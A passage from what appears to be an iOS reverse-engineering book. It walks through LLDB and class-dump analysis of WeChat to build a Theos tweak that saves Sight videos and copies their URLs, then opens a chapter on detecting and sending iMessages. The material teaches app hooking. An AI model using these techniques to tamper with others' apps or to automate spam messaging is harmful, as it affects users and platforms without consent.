@property(nonatomic)  BOOL noChange;  // @synthesize  noChange;  
- (void)parseContentForNetWithDataItem:(id)arg1;  
- (void)parseContentForUI;  
- (void)parsePat tern; 
@property(retain,  nonatomic)  NSString  *publicUserName;  // @synthesize  publicUserName;  
- (id)sequence;  
- (void)setCreateTime:(unsigned  long)arg1;  
- (void)setHash:(unsigned  int)arg1;  
- (void)setIsUploadFailed:(BOOL)arg1;  
- (void)setSequence:(id)arg1;  
@property(retain,  nonatomic)  NSMutableArray  *sharedGroupIDs;  // @synthesize  
sharedGroupIDs;  
@property(retain,  nonatomic)  SnsObject  *snsObject;  // @synthesize  snsObject;  
@property(retain,  nonatomic)  NSString  *sourceNickName;  // @synthesize  sourceNickName;  
@property(retain,  nonatomic)  NSString  *sourceUrl2;  // @synthesize  sourceUrl2;  
@property(retain,  nonatomic)  NSString  *sourceUrl;  // @synthesize  sourceUrl;  
@property(retain,  nonatomic)  NSString  *sourceUserName;  // @synthesize  sourceUserName;  
@property(retain,  nonatomic)  NSString  *statisticsData;  // @synthesize  statisticsData;  
@property(retain,  nonatomic)  NSString  *tid; // @synthesize  tid; 
@property(nonatomic)  int type; // @synthesize  type; 
@property(nonatomic)  int uploadErrType;  // @synthesize  uploadErrType;  
@property(retain,  nonatomic)  NSString  *username;  // @synthesize  username;  
@property(retain,  nonatomic)  NSArray *visibleUsers;  // @synthesize  visibleUsers;  
@property(nonatomic)  int withCount;  // @synthesize  withCount;  
@property(retain,  nonatomic)  NSMutableArray  *withUsers;  // @synthesize  withUsers;  
- (id)toBuffer;  
 
@end 
There are 4 occurrences of “path”  and “ url” keywords:  
- (id)descriptionForKeyPaths;  
- (id)keyPaths; 
@property(retain,  nonatomic)  NSString  *sourceUrl2;  
@property(retain,  nonatomic)  NSString  *sourceUrl;  
Now let’ s inspect their return values via LLDB. Repeat the previous operations to trigger 
the breakpoint on a Sight cell:  
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x002a091c  
MicroMessenger`___lldb_unnamed_function11980$$Micr oMessenger  + 208, queue = 
'com.apple.main -thread, stop reason = breakpoint  7.1 
    frame #0: 0x002a091c  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
208 
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 208: 
-> 0x2a091c:   blx    0xe08e0c                   ; 
___lldb_unnamed_function70162$$MicroMessenger  
   0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
(lldb) ni 
 
327 Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x002a0920  
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 212, queue = 
'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x002a0920  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
212 
MicroMessenger`___lldb_unnam ed_function11980$$MicroMessenger  + 212: 
-> 0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
   0x2a092a:   add    r0, pc 
(lldb) po [$r0 descriptionForKeyPaths]  
Class name: WCDataItem,  addr: 0x80f52b0  
tid: 1189618530368 0028954 
username:  wxid_hqouu9kgsgw3e6  
createtime:  1418135798  
commentUsers:  ( 
) 
contentObj:  <WCContentItem:  0x8724c20>  
 
(lldb) po [$r0 keyPaths]  
<__NSArrayI  0x87b5260>(  
tid, 
username,  
createtime,  
commentUsers,  
contentObj  
) 
 
(lldb) po [$r0 sourceUrl2]  
 nil 
(lldb) po [$r0 sourceUrl]  
 nil 
Seems there is nothing special in the return values, but WCContentItem has showed up so 
many times and grabs my attention. Obviously, the meaning of “ content ” is more specific than 
“data” , the content of the Sight may be supplied by this object. Now, take a look at 
WCContentItem.h:  
@interface  WCContentItem  : NSObject  <NSCoding>  
{ 
    NSString  *title; 
    NSString  *desc; 
    NSString  *titlePattern;  
    NSString  *descPattern;  
    NSString  *linkUrl;  
    NSString  *linkUrl2;  
    int type; 
    int flag; 
    NSString  *username;  
    NSString  *nickname;  
    int createtime;  
    NSMutableArray  *mediaList;  
} 
 
@property(nonatomic)  int createtime;  // @synthesize  createtime;  
- (void)dealloc;  
@property(retain,  nonatomic)  NSString  *desc; // @synthesize  desc; 
 
328 @property(retain,  nonatomic)  NSString  *descPattern;  // @synthesize  descPattern;  
- (void)encodeWithCoder:(id)arg1;  
@property(nonatomic)  int flag; // @synthesize  flag; 
- (id)init;  
- (id)initWithCoder:(id)arg1;  
- (BOOL)isValid;  
@property( retain, nonatomic)  NSString  *linkUrl;  // @synthesize  linkUrl;  
@property(retain,  nonatomic)  NSString  *linkUrl2;  // @synthesize  linkUrl2;  
@property(retain,  nonatomic)  NSMutableArray  *mediaList;  // @synthesize  mediaList;  
@property(retain,  nonatomic)  NSString  *nickname;  // @synthesize  nickname;  
@property(retain,  nonatomic)  NSString  *title; // @synthesize  title; 
@property(retain,  nonatomic)  NSString  *titlePattern;  // @synthesize  titlePattern;  
@property(nonatomic)  int type; // @synthesize  type; 
@property(retain,  nonatomic)  NSString  *username;  // @synthesize  username;  
 
@end 
There are 2 occurrences of “url”: 
@property(retain,  nonatomic)  NSString  *linkUrl;  
@property(retain,  nonatomic)  NSString  *linkUrl2;  
We can get a WCContentItem object via [WCDataItem contentObj] , then use LLDB to 
print the values of the above 2 properties. Repeat the previous operations to trigger the 
breakpoint on a Sight cell: 
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x002a091c  
MicroMessenger`___lldb_unnamed_function11980$$MicroMessen ger + 208, queue = 
'com.apple.main -thread, stop reason = breakpoint  8.1 
    frame #0: 0x002a091c  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
208 
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 208: 
-> 0x2a091c:   blx    0xe08e0c                  ; 
___lldb_unnamed_function70162$$MicroMessenger  
   0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
(lldb) ni 
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x002a0920  
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 212, queue = 
'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x002a0920  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
212 
MicroMessenger`___lldb_unnam ed_function11980$$MicroMessenger  + 212: 
-> 0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
   0x2a092a:   add    r0, pc 
(lldb) po [[$r0 contentObj]  linkUrl]  
https://support.weixin.qq.com/cgi -bin/mmsupport -
bin/readtemp late?t=page/common_page__upgrade&v=1  
(lldb) po [[$r0 contentObj]  linkUrl2]  
 nil 
Type this URL in browser to see what we ’ve got, as shown in figure 9 -28. 
 
329  
Figure 9- 28 [[$r0 contentObj] linkUrl]  
The result is not what we want. Since there is not too much content in WCContentItem.h, 
where could the Sight be? Back to this file, a property named mediaList attracts my attention. It 
is even more accurate than “content ”, is the Sight hidden in it? LLDB will answer us. Repeat the 
previous operations to trigger the breakpoint on a Sight cell:  
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x002a091c  
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 208, queue = 
'com.apple.main -thread, stop reason = breakpoint  8.1 
    frame #0: 0x002a091c  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
208 
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 208: 
-> 0x2a091c:   blx    0xe08e0c                   ; 
___lldb_unnamed_functi on70162$$MicroMessenger  
   0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
(lldb) ni 
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x002a0920  
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 212, queue = 
'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x002a0920  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
212 
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 212: 
-> 0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
   0x2a092a:   add    r0, pc 
(lldb) po [[$r0 contentObj]  mediaList]  

 
330 <__NSArrayM  0x8725580>(  
<WCMediaItem:  0x7e78490>  
) 
Now, a new class WCMediaItem appears. Let ’s check WCMediaItem.h:  
@interface  WCMediaItem  : NSObject  <NSCoding>  
{ 
    NSString  *mid; 
    int type; 
    int subType;  
    NSString  *title; 
    NSString  *desc; 
    NSString  *titlePattern;  
    NSString  *descPattern;  
    NSString  *userData;  
    NSString  *source;  
    NSMutableArray  *preview Urls; 
    WCUrl *dataUrl;  
    WCUrl *lowBandUrl;  
    struct CGSize imgSize;  
    BOOL likeFlag;  
    int likeCount;  
    NSMutableArray  *likeUsers;  
    int commentCount;  
    NSMutableArray  *commentUsers;  
    int withCount;  
    NSMutableArray  *withUsers;  
    int createTime;  
} 
 
- (id).cxx_construct;  
- (id)cityForData;  
@property(nonatomic)  int commentCount;  // @synthesize  commentCount;  
@property(retain,  nonatomic)  NSMutableArray  *commentUsers;  // @synthesize  commentUsers;  
- (id)comparativePathForPreview;  
@property(nonatomic)  int createTime;  // @synthesize  createTime;  
@property(retain,  nonatomic)  WCUrl *dataUrl;  // @synthesize  dataUrl;  
- (void)dealloc;  
@property(retain,  nonatomic)  NSString  *desc; // @synthesize  desc; 
@property(retain,  nonatomic)  NSString  *descPattern;  // @synthesize  descPattern;  
- (void)encodeWithCoder:(id)arg1;  
- (BOOL)hasData;  
- (BOOL)hasPreview;  
- (BOOL)hasSight;  
- (id)hashPathForString:(id)arg1;  
- (id)imageOfSize:(int)arg1;  
@property(nonatomic)  struct CGSize imgSize;  // @synthesize  imgSize;  
- (id)init;  
- (id)initWithCoder:(id)arg1;  
- (BOOL)isValid;  
@property(nonatomic)  int likeCount;  // @synthesize  likeCount;  
@property(nonatomic)  BOOL likeFlag;  // @synthesize  likeFlag;  
@property(retain,  nonatomic)  NSMutableArray  *likeUsers;  // @synthesize  likeUsers;  
- (CDStruct_c3b9c2ee)locationForData;  
@property(retain,  nonatomic)  WCUrl *lowBandUrl;  // @synthesize  lowBandUrl;  
- (id)mediaID;  
- (int)mediaType;  
@property(retain,  nonatomic)  NSString  *mid; // @synthesize  mid; 
- (id)pathForData;  
- (id)pathForPrevi ew; 
 
331 - (id)pathForSightData;  
@property(retain,  nonatomic)  NSMutableArray  *previewUrls;  // @synthesize  previewUrls;  
- (BOOL)saveDataFromData:(id)arg1;  
- (BOOL)saveDataFromMedia:(id)arg1;  
- (BOOL)saveDataFromPath:(id)arg1;  
- (BOOL)savePreviewFromData:(id)arg1;  
- (BOOL)savePreviewFromMedia:(id)arg1;  
- (BOOL)savePreviewFromPath:(id)arg1;  
- (BOOL)saveSightDataFromData:(id)arg1;  
- (BOOL)saveSightDataFromMedia:(id)arg1;  
- (BOOL)saveSightDataFromPath:(id)arg1;  
- (BOOL)saveSightPrevi ewFromMedia:(id)arg1;  
@property(retain,  nonatomic)  NSString  *source;  // @synthesize  source; 
@property(nonatomic)  int subType;  // @synthesize  subType;  
@property(retain,  nonatomic)  NSString  *title; // @synthesize  title; 
@property(retain,  nonatomic)  NSString  *titlePattern;  // @synthesize  titlePattern;  
@property(nonatomic)  int type; // @synthesize  type; 
@property(retain,  nonatomic)  NSString  *userData;  // @synthesize  userData;  
@property(nonatomic)  int withCount;  // @synthesize  withCount;  
@property(retain,  nonatomic) NSMutableArray  *withUsers;  // @synthesize  withUsers;  
- (id)videoStreamForData;  
- (id)voiceStreamForData;  
 
@end 
There are 8 occurrences of “path” : 
- (id)comparativePathForPreview;  
- (id)hashPathForString:(id)arg1;  
- (id)pathForData;  
- (id)pathForPreview;  
- (id)pathForSightData;  
- (BOOL)saveDataFromPath:(id)arg1;  
- (BOOL)savePreviewFromPath:(id)arg1;  
- (BOOL)saveSightDataFromPath:(id)arg1;  
And 3 occurrences of “url”: 
@property(retain,  nonatomic)  WCUrl *dataUrl;  
@property(retain,  nonatomic)  WCUrl *lowBandUrl;  
@property(retain,  nonatomic)  NSMutableArray  *previewUrls;  
Among those methods and properties, pathForData, pathForPreview and pathForSightData 
are very likely to return paths; dataUrl, lowBandUrl and previewUrls are very like ly to return 
URLs. Verify our guess ASAP with LLDB, repeat the previous operations to trigger the 
breakpoint on a Sight cell: 
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x002a091c  
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 208, queue = 
'com.apple.main -thread, stop reason = breakpoint  8.1 
    frame #0: 0x002a091c  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
208 
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 208: 
-> 0x2a091c:   blx    0xe08e0c                   ; 
___lldb_unnamed_function70162$$MicroMessenger  
   0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
 
332 (lldb) ni 
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x002a0920  
MicroMessenger`___lldb_unnamed_fu nction11980$$MicroMessenger  + 212, queue = 
'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x002a0920  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
212 
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 212: 
-> 0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
   0x2a092a:   add    r0, pc 
(lldb) po [[[[$r0 contentObj]  mediaList]  objectAtIndex:0]  pathForData]  
/var/mobile/Containers/Data/Application/E9BE84D8 -9982-4814-9289-
823D5FD91144/Library/WechatPrivate/c5f5eb23e53bb2ee021b0e89b5c4bc9a/wc/media/5/60/2a16b0
b62baf39924448a74fa03ff2  
(lldb) po [[[[$r0 contentObj]  mediaList]  objectAtIndex:0]  pathForPreview]  
/var/mobile/Containers/Data/Application/E9BE84D8 -9982-4814-9289-
823D5FD91144/Library/WechatPrivate/c5f5eb23e53bb2ee021b0e89b5c4bc9a/wc/media/5/7f/cdc793
9813d1a95feda4bed05f9b82  
(lldb) po [[[[$r0 contentObj]  mediaList]  objectAtIndex:0]  pathForSightData]  
/var/mobile/Containers/Data/Application/E9BE84D8 -9982-4814-9289-
823D5FD91144/Library/WechatPrivate/c5f5eb23e53bb2ee021b0e89b5c4bc9a/wc/media/5/60/2a16b0
b62baf39924448a74fa03ff2.mp4  
(lldb) po [[[[$r0 contentObj]  mediaList]  objectAtIndex:0]  dataUrl]  
type[1],  url[http://vcloud1023.tc.qq.com/1023_0114929ce86949a8bfb6f7b46b6b3 9b8.f0.mp4]  
(lldb) po [[[[$r0 contentObj]  mediaList]  objectAtIndex:0]  lowBandUrl]  
 nil 
(lldb) po [[[[$r0 contentObj]  mediaList]  objectAtIndex:0]  previewUrls]  
<__NSArrayM  0x8725950>(  
type[1],  
url[http://mmsns.qpic.cn/mmsns/WiaWbRORjpHsUXcNL3dNsVLDibRZ9oufPnXeJqZdlG4xhND43M87sh7DR
cxttVPxAO/0]  
) 
From the file names, I am pretty sure that they are the Sight information we ’ve been 
looking for. Whatever it is ssh or iFunBox that opens the local fil es; whether it be MobileSafari 
or Chrome that opens the URL, you can come to these conclusions:  
•  The value of pathForData is the local path of the Sight without suffix.  
•  The value of pathForPreview is the path of the Sight ’s preview image without suffix. 
•  The value of pathForSightData is the local path of the Sight with suffix.  
•  The value of dataUrl is the Internet URL of the Sight.  
•  The value of lowBandUrl is nil, but I guess this value is not nil when the network condition is not 
good. In order to save bandwidth, file from this URL may be smaller than file from dataURL on size.  
•  The value of previewUrls is the Internet URL of the Sight ’s preview images. 
The prototyping of tweak is finished for now. Let ’s comb our thoughts before coding.  
 
333 9.3   Result interpretation  
This practice covers Cycript, IDA and LLDB, we ’ve prototyped the tweak without strictly 
deducing the execution logic of WeChat. Now I will do a brief summary of our thoughts.  
1.   Add a long press gesture to Sight view 
Because there ’s already a long press gestu re on Sight view, there ’s no need to reinvent the 
wheel, we just need to find the existing one and hook it. With Reveal, we can locate the Sight 
view easily, thus find the action selector of the long press gesture. What is worth mentioning is 
that the action selector will be called twice, leading to inefficiency. We need to take this 
situation into consideration when writing tweak, and compose a proper condition to make the 
method execute only once.  
2.   Find the Sight object in C 
Although the MVC design pattern  says that M can be accessed through C, in this example, 
we cannot find any obvious methods in C to access M. Therefore, we ’ve started with the basic 
data source method tableView:cellForRowAtIndexPath: to find the suspicious data source of a cell, then loo ked through suspicious properties and methods in headers to locate the Sight 
object, and finally got the wanted information. Perhaps the procedure was not so rigorous, but we reached our goal and saved our time, it was not bad, right?  
9.4   Tweak writing  
The tar get of this section is to replace the options of the original long press menu with 
“Save to Disk ” and “ Copy URL” . With a well -constructed prototype, we don ’t have to explain it 
any further, let ’s get coding now.  
9.4.1  Create tweak project “ iOSREWCVideoDownloader”  using 
Theos  
The Theos commands are as follows:  
hangcom-mba:Documents  sam$ /opt/theos/bin/nic.pl   
NIC 2.0 - New Instance  Creator 
------------------------------  
  [1.] iphone/application  
  [2.] iphone/cydget  
  [3.] iphone/framework  
  [4.] iphone/library  
 
334   [5.] iphone/notification_center_widget  
  [6.] iphone/preference_bundle  
  [7.] iphone/sbsettingstoggle  
  [8.] iphone/tool  
  [9.] iphone/tweak  
  [10.] iphone/xpc_service  
Choose a Template  (required):  9 
Project Name (required):  iOSREWCVideoDownloader  
Package Name [com.yourcompany.iosrewcvideodownloader]:  com.iosre.iosrewcvideodownloader  
Author/Maintainer  Name [sam]: sam 
[iphone/tweak]  MobileSubstrate  Bundle filter [com.apple.springboard]:  com.tencent.xin  
[iphone/tweak]  List of applicati ons to terminate  upon installation  (space-separated,  '-' 
for none) [SpringBoard]:  MicroMessenger  
Instantiating  iphone/tweak  in iosrewcvideodownloader/...  
 Done. 
9.4.2 Compose iOSREWCVideoDownloader.h  
The finalized iOSREWCVideoDownloader.h looks like this:  
@interface  WCContentItem  : NSObject  
@property  (retain,  nonatomic)  NSMutableArray  *mediaList;  
@end 
 
@interface  WCDataItem  : NSObject  
@property  (retain,  nonatomic)  WCContentItem  *contentObj;  
@end 
 
@interface  WCUrl : NSObject  
@property  (retain,  nonatomic)  NSString *url; 
@end 
 
@interface  WCMediaItem  : NSObject  
@property  (retain,  nonatomic)  WCUrl *dataUrl;  
- (id)pathForSightData;  
@end 
 
@interface  WCContentItemViewTemplateNewSight  : UIView 
- (WCMediaItem  *)iOSREMediaItemFromSight;  
- (void)iOSREOnSaveToDisk;  
- (void)iOSREOnCopyURL;  
@end 
 
@interface  MMServiceCenter  : NSObject  
+ (id)defaultCenter;  
- (id)getService:(Class)arg1;  
@end 
 
@interface  WCFacade  : NSObject  
- (WCDataItem  *)getTimelineDataItemOfIndex:(int)arg1;  
@end 
 
@interface  WCTimeLineViewController  : NSObject  
- (int)calcDataItemIndex:(int)arg1;  
@end 
 
@interface  MMTableViewCell  : UITableViewCell  
@end 
 
 
335 @interface  MMTableView  : UITableView  
@end 
This header is composed by picking snippets from other class -dump headers. The existence 
of this header is simply for avoiding any warnings or errors when compiling the tweak.  
9.4.3   Edit Tweak.xm  
The finalized Tweak.xm looks like this:  
#import "iOSREWCV ideoDownloader.h"  
 
static MMTableViewCell  *iOSRECell;  
static MMTableView  *iOSREView;  
static WCTimeLineViewController  *iOSREController;  
 
%hook WCContentItemViewTemplateNewSight  
%new 
- (WCMediaItem  *)iOSREMediaItemFromSight  
{ 
 id responder  = self; 
 while (![responder  isKindOfClass:NSClassFromString(@"WCTimeLineViewController")])  
 { 
  if ([responder  isKindOfClass:NSClassFromString(@"MMTableViewCell")])  
iOSRECell  = responder;  
  else if ([responder  isKindOfClass:NSClassFromString(@"MMTableView")])  
iOSREView  = responder;  
  responder  = [responder  nextResponder];  
 } 
 iOSREController  = responder;  
 if (!iOSRECell  || !iOSREView  || !iOSREController)  
 { 
  NSLog(@"iOSRE:  Failed to get video object.");  
  return nil; 
 } 
 NSIndexPath  *indexPath  = [iOSREView  indexPathForCel l:iOSRECell];  
 int itemIndex  = [iOSREController  calcDataItemIndex:[indexPath  section]];  
 WCFacade  *facade = [(MMServiceCenter  *)[%c(MMServiceCenter)  defaultCenter]  
getService:[%c(WCFacade)  class]];  
 WCDataItem  *dataItem  = [facade getTimelineDataItemOfIndex :itemIndex];  
 WCContentItem  *contentItem  = dataItem.contentObj;  
 WCMediaItem  *mediaItem  = [contentItem.mediaList  count] != 0 ? 
(contentItem.mediaList)[0]  : nil; 
 return mediaItem;  
} 
 
%new 
- (void)iOSREOnSaveToDisk  
{ 
 NSString  *localPath  = [[self iOSREMedia ItemFromSight]  pathForSightData];  
 UISaveVideoAtPathToSavedPhotosAlbum(localPath,  nil, nil, nil); 
} 
 
%new 
- (void)iOSREOnCopyURL  
{ 
 UIPasteboard  *pasteboard  = [UIPasteboard  generalPasteboard];  
 pasteboard.string  = [self iOSREMediaItemFromSight].dataUrl.url;  
 
336 } 
 
static int iOSRECounter;  
 
- (void)onLongTouch  
{ 
 iOSRECounter++;  
 if (iOSRECounter  % 2 == 0) return; 
 
 [self becomeFirstResponder];  
 
 UIMenuItem  *saveToDiskMenuItem  = [[UIMenuItem  alloc] initWithTitle:@"Save  to Disk" 
action:@selector(iOSREOnSaveToDisk)];  
 UIMenuItem  *copyURLMenuItem  = [[UIMenuItem  alloc] initWithTitle:@"Copy  URL" 
action:@selector(iOSREOnCopyURL)];  
 
 UIMenuController  *menuController  = [UIMenuController  sharedMenuController];  
 [menuController  setMenuIt ems:@[saveToDiskMenuItem,  copyURLMenuItem]];  
 [menuController  setTargetRect:CGRectZero  inView:self];  
 [menuController  setMenuVisible:YES  animated:YES];  
 
 [saveToDiskMenuItem  release];  
 [copyURLMenuItem  release];  
} 
%end 
9.4.4   Edit Makefile and control files  
The finalized Makefile looks like this:  
export THEOS_DEVICE_IP  = iOSIP 
export TARGET = iphone:clang:latest:8.0  
export ARCHS = armv7 arm64 
 
include theos/makefiles/common.mk  
 
TWEAK_NAME  = iOSREWCVideoDownloader  
iOSREWCVideo Downloader_FILES  = Tweak.xm  
iOSREWCVideoDownloader_FRAMEWORKS  = UIKit 
 
include $(THEOS_MAKE_PATH)/tweak.mk  
 
after-install::  
 install.exec  "killall  -9 MicroMessenger"  
The finalized control looks like this:  
Package: com.iosre.iosrewcvideodownloader 
Name: iOSREWCVideoDownloader 
Depends:  mobilesubstrate,  firmware  (>= 8.0) 
Version:  1.0 
Architecture:  iphoneos -arm 
Description:  Play with Sight! 
Maintainer:  sam 
Author: sam 
Section:  Tweaks 
Homepage:  http://bbs.iosre.com  
 
337 9.4.5   Test 
Compile and install the tweak, then launch WeChat and long press a Sight, it will show our 
custom menu, as shown in figure 9 -29. 
 
Figure 9- 29 Custom menu  
Click “Save to Disk ”, the Sight will be saved to local album, as shown in figure 9 -30. 

 
338  
Figure 9- 30 Save the Sight to local album  
Click “Copy URL” , and paste it in OPlayer (or any other Apps that support online video 
playing), as shown in figure 9 -31.  
 
Figure 9- 31 Play online Sight in OPlayer  
All functions work as expected, mission accomplished!  

 
339 9.5   Easter eggs  
9.5.1  Find the Sight in UIMenuItem  
In section 9.2.7, we ’ve successfully found the Sight from WCTimeLineViewController. 
However, the whole process was not smooth: we haven ’t managed to find a direct way of 
accessing M via C, so we “had to”  find some clues from tableView:cellForRowAtIndexPath: to 
meet our needs. If we jump out of MVC and try to think from the view of WeChat itself, things 
may get much easier.  
Think with me: Long press the Sight view, a menu shows. Choose the menu option, a 
corresponding operation will be carried out on the Sight. In other words, there may be Sight 
related clues in the action selector of UIMenuItem. In figure 9 -11, we have already seen the 
action selector of “ Favorite” , which is onFavoriteAdd:, let ’s check its implementation in IDA,  as 
shown in figure 9 -32. 
 
Figure 9- 32 [WCContentItemViewTemplateNewSight onFavoriteAdd:]  
From figure 9 -32, we see our familiar WCDataItem, contentObj and mediaList at the 
beginning of this method. If we ’ve started with this method, the whole analysis workload would 
be reduced  by half at least. It more or less enlightens us that although MVC design pattern is a 
common trail of thinking in iOS App reverse engineering, if we can occasionally think off the track, we may get something unexpected and have more fun.  

 
340 9.5.2  Historical transition of WeChat ’s headers count  
From the historical transition of WeChat ’s headers count as figure 9 -33 to figure 9 -38 show, 
we can see how WeChat becomes excellent step by step . A journey of a thousand miles begins 
with a single step, kudos to WeChat!  
 
341  
Figure 9- 23 Headers directories of different WeChat versions  
 
Figure 9- 34 WeChat 3.0, 995 headers  

 
342  
Figure 9- 35 WeChat 4.5, 2267 headers  
 
Figure 9- 36 WeChat 5.0, 3734 headers  

 
343  
Figure 9- 37 WeChat 5.1, 3537 headers  
 
Figure 9- 38 WeChat 6.0, 5225 headers  
From WeChat 3.0 to WeChat 6.0, the number of headers has increased from less than 1,000 
to more than 5,000, which is a 5+ times amplification. With the global popularity of WeChat , its 
headers count is expected to surpass 10,000 sooner or later.  
9.6   Conclusion 
WeChat is the target of this chapter, we ’ve enriched Sight by adding 2 new features, i.e. “ 
Save to Disk” and “Copy URL” . As a powerful platform, WeChat possesses complicated 

 
344 structure and large amount of code; it was beautifully designed with clearly separated modules 
and well organized code. We have already learnt so much from it by just going through its 
headers, we can even see the different coding styles of different devel opers. I believe all of us can 
benefit a lot from studying WeChat ’s design pattern by reversing it. We will discuss what we 
find reversing WeChat on http://bbs.iosre.com , you are welcome to join us.  
  
 
345  
Practice 4 : Detect And Send iMessages 
 
 
10.1   iMessage  
iMessage is an IM service that Apple implements seamlessly into the stock Messages App 
(hereafter referrered to as MobileSMS). It was born in iOS 5 and became better ever since. 
Whether it ’s plain text, image, audio, or even video, iMessage can handle them with high speed, 
security and efficiency. We all love iMessage!  
Among all functions of iMessage, detecting if an address supports iMessage, and sending an 
iMessage are 2 most interesting functions witho ut doubt. Surprisingly, there are even companies 
that make profit from sending spam iMessages, and that ’s one of the main reasons that I 
developed the Cydia tweak “SMSNinja ”. You can’ t understand how to defense without knowing 
how to attack. In this chapter, we will combine all knowledge points we ’ve studied by far and 
start from scratch to reverse the functions of detecting and sending iMessages, as sublimation of the book. All the following operations are finished on iPhone 5, iOS 8.1.  
10.2   Detect if a number or email address supports iMessage  
As usual, before using tools to start reverse engineering, let ’s analyze the abstract target and 
concretize it, then form the idea and carry it out.  
10.2.1  Observe MobileSMS and look for cut -in points  
As MobileSMS users,  we will notice that during the process of sending a message, Apple will 
show us if we ’re currently sending an SMS or iMessage through the changes of texts and colors, 
say: 
•  When you start to compose a message by just finishing recipient’s address without entering the 
message body, if iOS detects that the address is iMessage supportive, the placeholder will change 
from “Text Message” to “iMessage”, as shown in figure 10-1. 
10 
  
 
346  
Figure 10-  1 Change of placeholder  
•  When you start to input message body, if the address only supports SMS, the “Send” button beside 
the input box will be green; if it supports iMessage, the button will be blue. 
•  When you hit the “Send” button to send this message, if this is an SMS, the message bubble will be green, otherwise it will be blue. 
These 3 phenomena will appear one after another. Since the process of detecting iMessage 
has already happened in the 1st phenomenon, it is enough to act as the cut -in point. We ’ll focus 
on the 1st phenomenon from now on.  
After locating the cut-in point, let ’s think together to concretize the phenomenon into a 
reverse engineering idea.  
What we can observe is visible on UI, i.e. the change from “Text Message”  to “iMessage” . 
As we’ ve already known, visualizations on UI don ’t come from nowhere but the data source, 
hence by referring to visualizations, we can find the data source, i.e. placeholder, using Cycript. 
Placeholder doesn ’t come from nowhere but its data source either. The reason why 
placeholder changes is that its data source (data sour ce’s data source, and so on. Hereafter 
referred to as the Nth data source) changes, like the following pseudo code presents:  
id dataSource  = ?; 
id a = function(dataSource);  
id b = function(a);  
id c = function(b);  
... 
id z = function(y);  
NSString  *placeholder  = function(z);  
From the above snippet we can know that the original data source is dataSource, its change 
in turn results in the change of placeholder. Well, what ’s the original data source? In the 1st 
phenomenon, our only input is the address, so the original data source is sure to be the address. 

 
347 For detecting iMessages, there should be a conversion from dataSource to placeholder, and this 
conversion process is the actual meaning of “detecting iMessages ” as well our target in this 
section, as shown in figure 10 -2. 
 
Figure 10-  2 Conversion from dataSource to placeholder  
You may wonder, since figure 10 -2 is so straightforward and dataSource is already known, 
why don ’t we start from it directly and trace placeholder? Then we can reproduce the process 
and achieve our goal. Actually, we ’re not living in a fairy tale, the real world is usually not 
idealized. For one thing, we don ’t have the source code of MobileSMS; for the other thing, in 
general cases, the conversion is much more complex, as can be illustrated in figure 10 -3. 

 
348  
Figure 10-  3 Real conversion from dataSource to placeholder  
dataSource must be converted multiple times to become placeholder, their relationship is 
very intricate. If we start from d ataSource, how can we know which of the 4 routines leads to 
placeholder? Under such circumstance, because there is only one placeholder, it ’s more efficient 
and doable to start from placeholder and trace back to dataSource to reproduce the whole 
process.  
In conclusion, the ideas of this practice are: first use Cycript to locate placeholder, then trace 
the Nth data source of placeholder using IDA and LLDB, until we get dataSource. Finally 
reproduce the process of how dataSource becomes placeholder. Looks as easy as a regular 3 -step 
job? Actions not only speak louder than words, but also implement harder than words, you ’ll 
feel it soon. 
10.2.2   Find placeholder using Cycript  
Open MobileSMS and create a new message; enter “bbs.iosre.com”  as the address and then 
tap “ return”  on keyboard to end editing, as shown in figure 10- 4. 

 
349  
Figure 10-  4 Create a new message  
Since we are using Cycript to find placeholder, first we should find the view that displays the 
current placeholder “Text Message” ; they must have a close connection, so get one, get the 
other. Right? Let ’s do it.  
FunMaker- 5:~ root# cycript -p MobileSMS 
cy# ?expand 
expand == true 
cy# [[UIApp keyWindow]  recursiveDescription]  
The view hierarchy of keyWindow is quite rich in content, so we ’re not pasting it here. If 
you search “Text Message”  in the output, you will find that there isn ’t any match. Why? Maybe 
